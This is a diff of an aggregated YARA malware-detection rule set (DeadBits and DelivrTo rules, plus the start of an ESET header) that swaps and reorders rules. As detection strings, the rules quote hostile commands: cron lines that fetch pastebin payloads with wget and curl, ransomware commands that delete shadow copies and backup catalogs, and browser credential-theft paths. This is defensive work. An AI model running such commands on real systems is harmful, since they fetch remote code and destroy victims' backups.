-rule DEADBITS_Watchdog_Botnet : BOTNET LINUXMALWARE EXPLOITATION CVE_2019_11581 CVE_2019_10149
+rule DEADBITS_Silenttrinity : FILE
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "ae95f934-2a9b-5c65-a11f-ea946d7f1bc6"
-		date = "2019-07-22"
-		modified = "2019-07-22"
-		reference = "https://twitter.com/polarply/status/1153232987762376704"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/WatchBog_Linux.yara#L1-L100"
+		id = "40f9174c-e9a5-5453-b5fa-6c01c46daffa"
+		date = "2019-07-19"
+		modified = "2019-07-19"
+		reference = "https://countercept.com/blog/hunting-for-silenttrinity/"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/SilentTrinity_Payload.yara#L1-L55"
 		license_url = "N/A"
-		logic_hash = "aea8afdf118b79f701941ddd4306ee0f1c947ea59de5485ff977beff95e06d35"
+		logic_hash = "7fd1775aadfccfdf141c0721f557e6c54b058ac17a59a8e4561dd62ab4a1eff3"
 		score = 75
 		quality = 78
-		tags = "BOTNET, LINUXMALWARE, EXPLOITATION, CVE_2019_11581, CVE_2019_10149"
-		Author = "Adam M. Swanda"
-
-	strings:
-		$py0 = "libpython" ascii
-		$str0 = "*/3 * * * * root wget -q -O- https://pastebin.com/raw/" ascii
-		$str1 = "*/1 * * * * root curl -fsSL https://pastebin.com/raw/" ascii
-		$str6 = "onion.to"
-		$str7 = /https?:\/\/pastebin.com\/raw/ nocase
-		$str8 = "http://icanhazip.com/"
-		$str9 = "http://ident.me/"
-		$scan0 = "Scan_run"
-		$scan1 = "scan_nexus"
-		$scan2 = "scan_couchdb"
-		$scan3 = "scan_jenkins"
-		$scan4 = "scan_laravel"
-		$scan5 = "scan_redis"
-		$exploit01 = "CVE_2015_4335"
-		$exploit02 = "CVE_2018_1000861"
-		$exploit03 = "CVE_2018_8007"
-		$exploit04 = "CVE_2019_1014"
-		$exploit05 = "CVE_2019_11581"
-		$exploit06 = "CVE_2019_7238"
-		$pwn0 = "pwn_couchdb"
-		$pwn1 = "pwn_jenkins"
-		$pwn2 = "pwn_jira"
-		$pwn3 = "pwn_nexus"
-		$pwn4 = "pwn_redis"
-		$pwn5 = "pwn_exim"
-		$payload = /payload(s)/ nocase
-		$jira_token = "atlassian.xsrf.token=%s" ascii fullword
-		$jira_cmd = "set ($cmd=\"%s\")" ascii fullword
-		$jira_id = "JSESSIONID=%s" ascii fullword
-
-	condition:
-		uint32be( 0x0 ) == 0x7f454c46 and $py0 and ( ( all of ( $pwn* ) and all of ( $scan* ) ) or ( $payload and all of ( $jira* ) and 5 of ( $str* ) ) or ( all of ( $str* ) and all of ( $exploit* ) ) )
-}
-rule DEADBITS_Avemaria_Warzone : AVEMARIA WARZONE WINMALWARE INFOSTEALER FILE
-{
-	meta:
-		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "1e03927b-d59c-5e1f-bdee-e44dfb172fad"
-		date = "2019-07-18"
-		modified = "2019-08-08"
-		reference = "https://github.com/deadbits/yara-rules"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/avemaria_warzone.yara#L1-L32"
-		license_url = "N/A"
-		logic_hash = "1fe55fc8ea80616b11757193c2c74b9cf577ab661ddca4c6c64cfad63a300614"
-		score = 75
-		quality = 80
-		tags = "AVEMARIA, WARZONE, WINMALWARE, INFOSTEALER, FILE"
+		tags = "FILE"
+		Description = "Attempts to detect the SilentTrinity malware family"
 		Author = "Adam M. Swanda"
 
 	strings:
-		$str1 = "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q " ascii fullword
-		$str2 = "MsgBox.exe" wide fullword
-		$str4 = "\\System32\\cmd.exe" wide fullword
-		$str6 = "Ave_Maria" wide
-		$str7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" ascii fullword
-		$str8 = "SMTP Password" wide fullword
-		$str11 = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide fullword
-		$str12 = "\\sqlmap.dll" wide fullword
-		$str14 = "SELECT * FROM logins" ascii fullword
-		$str16 = "Elevation:Administrator!new" wide
-		$str17 = "/n:%temp%" ascii wide
+		$pdb01 = "SILENTTRINITY.pdb" ascii
+		$str01 = "Found {0} in zip" ascii fullword
+		$str02 = "{0} not in zip file" ascii fullword
+		$str03 = "Invalid HMAC: {0}" ascii fullword
+		$str04 = "Attempting HTTP GET to {0}" ascii fullword
+		$str05 = "Downloaded {0} bytes" ascii fullword
+		$str06 = "Error downloading {0}: {1}" ascii fullword
+		$str07 = "Attempting HTTP POST to {0}" ascii fullword
+		$str08 = "POST" ascii fullword
+		$str09 = "application/octet-stream" ascii fullword
+		$str10 = "Error sending job results to {0}: {1}" ascii fullword
+		$str11 = ".dll" ascii fullword
+		$str12 = "Trying to resolve assemblies by staging zip" ascii fullword
+		$str13 = "'{0}' loaded" ascii fullword
+		$str14 = "Usage: SILENTTRINITY.exe <URL> [<STAGE_URL>]" ascii fullword
+		$str15 = "IronPython.dll" ascii fullword
+		$str16 = "IronPythonDLL" ascii fullword
+		$str17 = "DEBUG" ascii fullword
+		$str18 = "Main.py" ascii fullword
+		$str19 = "Execute" ascii fullword
+		$str20 = "SILENTTRINITY.Properties.Resources" ascii fullword
+		$str21 = ".zip" ascii fullword
+		$a00 = "HttpGet" ascii fullword
+		$a01 = "System.Net" ascii fullword
+		$a02 = "Target" ascii fullword
+		$a03 = "WebClient" ascii fullword
+		$a04 = "get_Current" ascii fullword
+		$a05 = "Endpoint" ascii fullword
+		$a06 = "AesDecrypt" ascii fullword
+		$a07 = "AesEncrypt" ascii fullword
+		$a08 = "cert" ascii fullword
+		$a09 = "WebRequest" ascii fullword
+		$a10 = "HttpPost" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB ) and ( 5 of ( $str* ) or all of them )
+		uint16( 0 ) == 0x5a4d and ( ( 8 of ( $str* ) or ( all of ( $a* ) and $pdb01 ) or $pdb01 ) )
 }
 rule DEADBITS_Godlua_Linux : LINUXMALWARE FILE
 {
@@ -67245,45 +67734,41 @@ rule DEADBITS_Godlua_Linux : LINUXMALWARE FILE
 	condition:
 		uint16( 0 ) == 0x457f and ( all of them or ( any of ( $identifier* ) and $resolvers and any of ( $tmp* ) and 4 of ( $str* ) ) or ( any of ( $identifier* ) and any of ( $tmp* ) and 4 of ( $str* ) ) )
 }
-rule DEADBITS_Acbackdoor_ELF : LINUX MALWARE BACKDOOR
+rule DEADBITS_Jsworm : MALWARE FILE
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
-		author = "Adam M. Swanda"
-		id = "82eb41bf-cd1d-5b00-973b-31a79c75cfc0"
-		date = "2019-11-08"
-		modified = "2019-12-04"
-		reference = "https://www.intezer.com/blog-acbackdoor-analysis-of-a-new-multiplatform-backdoor/"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/ACBackdoor_Linux.yara#L1-L41"
+		author = "Adam Swanda"
+		id = "6d452d04-b475-5241-890c-68119a7a8691"
+		date = "2019-09-06"
+		modified = "2019-09-06"
+		reference = "https://github.com/deadbits/yara-rules/"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/JSWorm.yara#L1-L38"
 		license_url = "N/A"
-		logic_hash = "48d741fba86cdfc8aac779d4b3227d45a17e0e9fba74b19820f1b8308bb93322"
+		logic_hash = "99074e25ec15c5b25fa41bef19203f5ddc227acd51fadca1e2c3ece538b3da01"
 		score = 75
-		quality = 55
-		tags = "LINUX, MALWARE, BACKDOOR"
+		quality = 78
+		tags = "MALWARE, FILE"
 
 	strings:
-		$ua_str = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" ascii fullword
-		$header1 = "Access-Control:" ascii fullword
-		$header2 = "X-Access" ascii
-		$initd = "/etc/init.d/update-notifier" ascii fullword
-		$str001 = "#!/bin/sh -e" ascii fullword
-		$str002 = "### BEGIN INIT INFO" ascii fullword
-		$str003 = "# Provides:          update-notifier" ascii fullword
-		$str004 = "# Required-Start:    $local_fs" ascii fullword
-		$str005 = "# Required-Stop:" ascii fullword
-		$str006 = "# Default-Start:     S" ascii fullword
-		$str007 = "# Default-Stop:" ascii fullword
-		$str008 = "### END INIT INFO" ascii fullword
-		$str010 = "  *) echo \"Usage: $0 {start|stop|restart|force-reload}\" >&2; ;;" ascii fullword
-		$str011 = "esac" ascii fullword
-		$str012 = "[ -x /usr/local/bin/update-notifier ] \\" ascii fullword
-		$str013 = "    && exec /usr/local/bin/update-notifier" ascii fullword
-		$rcd01 = "/etc/rc2.d/S01update-notifier" ascii fullword
-		$rcd02 = "/etc/rc3.d/S01update-notifier" ascii fullword
-		$rcd03 = "/etc/rc5.d/S01update-notifier" ascii fullword
+		$name00 = "JSWORM" nocase
+		$str00 = "DECRYPT.txt" nocase
+		$str02 = "cmd.exe"
+		$str03 = "/c reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\"
+		$str04 = /\/c taskkill.exe taskkill \/f \/im (store|sqlserver|dns|sqlwriter)\.exe/
+		$str05 = "/c start C:\\ProgramData\\"
+		$str06 = "/c vssadmin.exe delete shadows /all /quiet"
+		$str07 = "/c bcdedit /set {default} bootstatuspolicy ignoreallfailures -y"
+		$str08 = "/c bcdedit /set {default} recoveryenabled No -y"
+		$str09 = "/c wbadmin delete catalog -quiet"
+		$str10 = "/c wmic shadowcopy delete -y"
+		$uniq00 = "fuckav"
+		$uniq01 = "DECRYPT.hta" nocase
+		$uniq02 = "Backup e-mail for contact :"
+		$uniq03 = "<HTA:APPLICATION APPLICATIONNAME=" nocase
 
 	condition:
-		( uint32be( 0x0 ) == 0x7f454c46 ) and ( ( $ua_str and all of ( $header* ) and $initd and all of ( $rcd* ) ) or ( $ua_str and all of ( $header* ) and 10 of ( $str* ) ) )
+		uint16( 0 ) == 0x5a4d and ( ( $name00 and 5 of ( $str* ) ) or ( 5 of ( $str* ) and 2 of ( $uniq* ) ) or ( $name00 and any of ( $uniq* ) ) )
 }
 rule DEADBITS_Silenttrinity_Delivery_Document : FILE
 {
@@ -67320,11 +67805,86 @@ rule DEADBITS_Silenttrinity_Delivery_Document : FILE
 	condition:
 		uint16( 0 ) == 0xcfd0 and filesize < 200KB and ( 8 of ( $s* ) or all of them )
 }
+rule DEADBITS_Redghost_Linux : POSTEXPLOITATION LINUXMALWARE
+{
+	meta:
+		description = "No description has been set in the source file - DeadBits"
+		author = "Adam Swanda"
+		id = "f598e115-f821-5932-aa14-5254bf28092c"
+		date = "2019-08-07"
+		modified = "2019-08-08"
+		reference = "https://github.com/d4rk007/RedGhost/"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/RedGhost_Linux.yara#L1-L45"
+		license_url = "N/A"
+		logic_hash = "0b12a0eda0a3b65c3da787770afb010eb5cd36426d41c04aca862ae1b01ab770"
+		score = 75
+		quality = 80
+		tags = "POSTEXPLOITATION, LINUXMALWARE"
+		Author = "Adam M. Swanda"
+
+	strings:
+		$name = "[ R E D G H O S T - P O S T  E X P L O I T - T O O L]" ascii
+		$feature0 = "Payloads" ascii
+		$feature1 = "SudoInject" ascii
+		$feature2 = "lsInject" ascii
+		$feature3 = "Crontab" ascii
+		$feature4 = "GetRoot" ascii
+		$feature5 = "Clearlogs" ascii
+		$feature6 = "MassinfoGrab" ascii
+		$feature7 = "CheckVM" ascii
+		$feature8 = "MemoryExec" ascii
+		$feature9 = "BanIP" ascii
+		$func0 = "checkVM(){" ascii
+		$func1 = "memoryexec(){" ascii
+		$func2 = "banip(){" ascii
+		$func3 = "linprivesc(){" ascii
+		$func4 = "dirty(){" ascii
+		$func5 = "Ocr(){" ascii
+		$func6 = "clearlog(){" ascii
+		$func7 = "conmethods(){" ascii
+		$func8 = "add2sys(){" ascii
+
+	condition:
+		( uint16be( 0x0 ) == 0x2321 and for any i in ( 0 .. 64 ) : ( uint16be( i ) == 0x2f62 and uint8( i + 2 ) == 0x68 ) ) and ( $name or 5 of them )
+}
+rule DEADBITS_Dacls_Trojan_Windows : FILE
+{
+	meta:
+		description = "No description has been set in the source file - DeadBits"
+		author = "Adam Swanda"
+		id = "424b2c0d-2373-5a72-9a97-52b4bfc5cdcf"
+		date = "2020-01-07"
+		modified = "2020-01-07"
+		reference = "https://github.com/deadbits/yara-rules"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/Dacls_Windows.yara#L1-L30"
+		license_url = "N/A"
+		logic_hash = "b77df7e3be9c264d6a63d40dbf49c41e9dd55b4e570c063b5710b849c36cc166"
+		score = 75
+		quality = 80
+		tags = "FILE"
+		Author = "Adam M. Swanda"
+
+	strings:
+		$fext00 = ".exe" ascii wide
+		$fext01 = ".cmd" ascii wide
+		$fext02 = ".bat" ascii wide
+		$fext03 = ".com" ascii wide
+		$str00 = "Software\\mthjk" ascii wide
+		$str01 = "WindowsNT.dll" ascii fullword
+		$str02 = "GET %s HTTP/1.1" ascii fullword
+		$str03 = "content-length:" ascii fullword
+		$str04 = "Connection: keep-alive" ascii fullword
+		$cls00 = "c_2910.cls" ascii fullword
+		$cls01 = "k_3872.cls" ascii fullword
+
+	condition:
+		( uint16( 0 ) == 0x5a4d ) and ( ( all of ( $cls* ) ) or ( all of ( $fext* ) and all of ( $str* ) ) )
+}
 /*
  * YARA Rule Set
  * Repository Name: DelivrTo
  * Repository: https://github.com/delivr-to/detections
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 376762d71eb1777874d366136595994378416ef5
  * Number of Rules: 12
  * Skipped: 0 (age), 2 (quality), 0 (score), 0 (importance)
@@ -67334,53 +67894,51 @@ rule DEADBITS_Silenttrinity_Delivery_Document : FILE
  *
  * NO LICENSE SET
  */
-rule DELIVRTO_SUSP_CONCAT_ZIP_Nov24 : FILE
+rule DELIVRTO_SUSP_NESTED_7ZIP_Feb25 : FILE
 {
 	meta:
-		description = "Zip archives concatenated together, based on the presence of more than one End of Central Directory record signature"
+		description = "Detects a 7-Zip archive containing a 7-Zip archive"
 		author = "delivr.to"
-		id = "1b865dfb-380a-531d-97cf-c62a1a37f4a9"
-		date = "2024-11-13"
-		modified = "2024-11-13"
-		reference = "https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/"
-		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/concatenated_zip.yar#L1-L15"
+		id = "d5b114c0-09eb-576f-bbde-c1a2b281b6b4"
+		date = "2025-02-06"
+		modified = "2025-02-06"
+		reference = "https://www.trendmicro.com/en_ae/research/25/a/cve-2025-0411-ukrainian-organizations-targeted.html"
+		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/nested_7zip.yar#L1-L13"
 		license_url = "N/A"
-		logic_hash = "7a102d677f06fb01b2a23ec61ec0844147f8789e9f2742928869f209e067805b"
+		logic_hash = "47bd777d120e4c5b324e2c9a2a5ecb3fe8c5177c3ff2a83122ed08a66554b560"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$fh = { 50 4B 03 04 }
-		$eocd = { 50 4B 05 06 }
+		$magic = { 37 7A BC AF 27 1C }
 
 	condition:
-		$fh at 0 and #fh > 1 and #eocd == #fh
+		$magic at 0 and #magic == 2
 }
-rule DELIVRTO_SUSP_PDF_MHT_Activemime_Sept23 : FILE
+rule DELIVRTO_SUSP_Onenote_Win_Script_Encoding_Feb23 : FILE
 {
 	meta:
-		description = "Presence of MHT ActiveMime within PDF for polyglot file"
+		description = "Presence of Windows Script Encoding Header in a OneNote file with embedded files"
 		author = "delivr.to"
-		id = "fbac1371-bad4-5751-a5c4-ce6c270fb83e"
-		date = "2023-09-04"
-		modified = "2023-09-04"
-		reference = "https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html"
-		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/pdf_mht_activemime.yar#L1-L19"
+		id = "95cd5ce0-07b3-5503-ad6f-944206bd4fb6"
+		date = "2023-02-19"
+		modified = "2023-02-19"
+		reference = "https://github.com/delivr-to/detections"
+		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/onenote_windows_script_encoding_file.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "af1450f649de6daec242f11e3b3c35305d3127fac4ef719a4ddb4edab3ae3651"
-		score = 70
+		logic_hash = "b7068f551b3665358f461a076c2d46c82db558d7fa4acb7d3c9c5c2afce31253"
+		score = 60
 		quality = 78
 		tags = "FILE"
 
 	strings:
-		$mht0 = "mime" ascii nocase
-		$mht1 = "content-location:" ascii nocase
-		$mht2 = "content-type:" ascii nocase
-		$act = "edit-time-data" ascii nocase
+		$one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 }
+		$fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
+		$wse = { 23 40 7E 5E }
 
 	condition:
-		uint32( 0 ) == 0x46445025 and all of ( $mht* ) and $act
+		filesize < 5MB and ( $one at 0 ) and $fdso and $wse
 }
 rule DELIVRTO_SUSP_SVG_Foreignobject_Nov24
 {
@@ -67405,53 +67963,53 @@ rule DELIVRTO_SUSP_SVG_Foreignobject_Nov24
 	condition:
 		all of them
 }
-rule DELIVRTO_SUSP_Onenote_RTLO_Character_Feb23 : FILE
+rule DELIVRTO_SUSP_PDF_MHT_Activemime_Sept23 : FILE
 {
 	meta:
-		description = "Presence of RTLO Unicode Character in a OneNote file with embedded files"
+		description = "Presence of MHT ActiveMime within PDF for polyglot file"
 		author = "delivr.to"
-		id = "03d86391-1392-5734-af5f-8a2c7b99167a"
-		date = "2023-02-17"
-		modified = "2023-02-17"
-		reference = "https://github.com/delivr-to/detections"
-		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/onenote_rtlo_filename.yar#L1-L22"
+		id = "fbac1371-bad4-5751-a5c4-ce6c270fb83e"
+		date = "2023-09-04"
+		modified = "2023-09-04"
+		reference = "https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html"
+		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/pdf_mht_activemime.yar#L1-L19"
 		license_url = "N/A"
-		logic_hash = "286bc1ab1f5df0d64634f53cc82357187306c40b063b156f36b602e131262c7a"
-		score = 60
-		quality = 55
+		logic_hash = "af1450f649de6daec242f11e3b3c35305d3127fac4ef719a4ddb4edab3ae3651"
+		score = 70
+		quality = 78
 		tags = "FILE"
 
 	strings:
-		$one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 }
-		$fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
-		$rtlo = { 00 2E 20 }
+		$mht0 = "mime" ascii nocase
+		$mht1 = "content-location:" ascii nocase
+		$mht2 = "content-type:" ascii nocase
+		$act = "edit-time-data" ascii nocase
 
 	condition:
-		filesize < 5MB and ( $one at 0 ) and $fdso and $rtlo
+		uint32( 0 ) == 0x46445025 and all of ( $mht* ) and $act
 }
-rule DELIVRTO_SUSP_Onenote_Repeated_Filedatareference_Feb23 : FILE
+rule DELIVRTO_SUSP_CONCAT_ZIP_Nov24 : FILE
 {
 	meta:
-		description = "Repeated references to files embedded in OneNote file. May indicate multiple copies of file hidden under image, as leveraged by Qakbot et al."
+		description = "Zip archives concatenated together, based on the presence of more than one End of Central Directory record signature"
 		author = "delivr.to"
-		id = "2a46d6cc-2800-5645-889c-7ad7d7aa69bd"
-		date = "2023-02-17"
-		modified = "2023-02-17"
-		reference = "https://github.com/delivr-to/detections"
-		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/onenote_repeated_files.yar#L1-L23"
+		id = "1b865dfb-380a-531d-97cf-c62a1a37f4a9"
+		date = "2024-11-13"
+		modified = "2024-11-13"
+		reference = "https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/"
+		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/concatenated_zip.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "ef74a128de4d3745af856957931eaae0c0ae5a5583eab1a7c58d6dd666e7fd15"
-		score = 60
+		logic_hash = "7a102d677f06fb01b2a23ec61ec0844147f8789e9f2742928869f209e067805b"
+		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 }
-		$fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
-		$fref = { 3C 00 69 00 66 00 6E 00 64 00 66 00 3E 00 7B 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? }
+		$fh = { 50 4B 03 04 }
+		$eocd = { 50 4B 05 06 }
 
 	condition:
-		filesize < 5MB and ( $one at 0 ) and $fdso and #fref > ( #fdso * 4 )
+		$fh at 0 and #fh > 1 and #eocd == #fh
 }
 rule DELIVRTO_SUSP_ZIP_Smuggling_Jun01 : FILE
 {
@@ -67500,75 +68058,6 @@ rule DELIVRTO_SUSP_ZIP_Smuggling_Egg_Jun01 : FILE
 	condition:
 		uint32( 0 ) == 0x04034b50 and #lfh > 0 and #lfh <= 10 and #eocd == 1 and #egg > 0 and $egg in ( @lfh [ #lfh ] + 30 + uint16( @lfh [ #lfh ] + 26 ) + uint16( @lfh [ #lfh ] + 28 ) + uint32( @lfh [ #lfh ] + 18 ) .. uint32( @eocd [ 1 ] + 16 ) )
 }
-rule DELIVRTO_SUSP_HTML_WASM_Smuggling
-{
-	meta:
-		description = "Presence of Base64 JavaScript blob loading WASM"
-		author = "delivr.to"
-		id = "fc83bb4f-ba8a-52d2-b9ce-632da5341f77"
-		date = "2024-02-28"
-		modified = "2024-05-24"
-		reference = "https://github.com/delivr-to/detections"
-		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/html_wasm.yar#L1-L13"
-		license_url = "N/A"
-		logic_hash = "4bca88862c28db947c04c40e40fdecc682223d1eb90c98350fbd6c5d8c6c4636"
-		score = 70
-		quality = 80
-		tags = ""
-
-	strings:
-		$wasm = "WebAssembly.Module" base64
-		$int = "WebAssembly.Instance" base64
-		$inst = "WebAssembly.instantiate" base64
-
-	condition:
-		all of them
-}
-rule DELIVRTO_SUSP_Msg_CVE_2023_23397_Mar23 : CVE_2023_23397 FILE
-{
-	meta:
-		description = "MSG file with a PidLidReminderFileParameter property, potentially exploiting CVE-2023-23397"
-		author = "delivr.to"
-		id = "a0ede2d3-7789-5662-9575-5d0a5cf4457c"
-		date = "2023-03-15"
-		modified = "2023-03-15"
-		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
-		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/msg_cve_2023_23397.yar#L1-L20"
-		license_url = "N/A"
-		logic_hash = "0476cf7f93c4f6cc48c19933f31360b62fe5e339f6a2a31dee8ad95f83ce67d7"
-		score = 60
-		quality = 80
-		tags = "CVE-2023-23397, FILE"
-
-	strings:
-		$app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
-		$rfp = { 1F 85 00 00 }
-
-	condition:
-		uint32be( 0 ) == 0xD0CF11E0 and uint32be( 4 ) == 0xA1B11AE1 and $app and $rfp
-}
-rule DELIVRTO_SUSP_NESTED_7ZIP_Feb25 : FILE
-{
-	meta:
-		description = "Detects a 7-Zip archive containing a 7-Zip archive"
-		author = "delivr.to"
-		id = "d5b114c0-09eb-576f-bbde-c1a2b281b6b4"
-		date = "2025-02-06"
-		modified = "2025-02-06"
-		reference = "https://www.trendmicro.com/en_ae/research/25/a/cve-2025-0411-ukrainian-organizations-targeted.html"
-		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/nested_7zip.yar#L1-L13"
-		license_url = "N/A"
-		logic_hash = "47bd777d120e4c5b324e2c9a2a5ecb3fe8c5177c3ff2a83122ed08a66554b560"
-		score = 40
-		quality = 80
-		tags = "FILE"
-
-	strings:
-		$magic = { 37 7A BC AF 27 1C }
-
-	condition:
-		$magic at 0 and #magic == 2
-}
 rule DELIVRTO_SUSP_ZPAQ_Archive_Nov23 : FILE
 {
 	meta:
@@ -67582,7 +68071,7 @@ rule DELIVRTO_SUSP_ZPAQ_Archive_Nov23 : FILE
 		license_url = "N/A"
 		logic_hash = "348144ee7137def00b37e074507e8148e51d34c484802a56bcd6e090d4628f18"
 		score = 40
-		quality = 55
+		quality = 80
 		tags = "FILE"
 
 	strings:
@@ -67592,211 +68081,138 @@ rule DELIVRTO_SUSP_ZPAQ_Archive_Nov23 : FILE
 	condition:
 		$fh at 0 and $block_header
 }
-rule DELIVRTO_SUSP_Onenote_Win_Script_Encoding_Feb23 : FILE
+rule DELIVRTO_SUSP_Onenote_Repeated_Filedatareference_Feb23 : FILE
 {
 	meta:
-		description = "Presence of Windows Script Encoding Header in a OneNote file with embedded files"
+		description = "Repeated references to files embedded in OneNote file. May indicate multiple copies of file hidden under image, as leveraged by Qakbot et al."
 		author = "delivr.to"
-		id = "95cd5ce0-07b3-5503-ad6f-944206bd4fb6"
-		date = "2023-02-19"
-		modified = "2023-02-19"
+		id = "2a46d6cc-2800-5645-889c-7ad7d7aa69bd"
+		date = "2023-02-17"
+		modified = "2023-02-17"
 		reference = "https://github.com/delivr-to/detections"
-		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/onenote_windows_script_encoding_file.yar#L1-L22"
+		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/onenote_repeated_files.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "b7068f551b3665358f461a076c2d46c82db558d7fa4acb7d3c9c5c2afce31253"
+		logic_hash = "ef74a128de4d3745af856957931eaae0c0ae5a5583eab1a7c58d6dd666e7fd15"
 		score = 60
-		quality = 78
+		quality = 80
 		tags = "FILE"
 
 	strings:
 		$one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 }
 		$fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
-		$wse = { 23 40 7E 5E }
+		$fref = { 3C 00 69 00 66 00 6E 00 64 00 66 00 3E 00 7B 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? }
 
 	condition:
-		filesize < 5MB and ( $one at 0 ) and $fdso and $wse
+		filesize < 5MB and ( $one at 0 ) and $fdso and #fref > ( #fdso * 4 )
 }
-/*
- * YARA Rule Set
- * Repository Name: ESET
- * Repository: https://github.com/eset/malware-ioc
- * Retrieval Date: 2025-06-08
- * Git Commit: eeab168d4cd6bac7c5bd06defb3d7198bd58f37f
- * Number of Rules: 103
- * Skipped: 0 (age), 5 (quality), 0 (score), 0 (importance)
- *
- *
- * LICENSE
- *
- * Copyright (c) 2014-2018 ESET spol. s r.o.
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-1. Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-2. Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
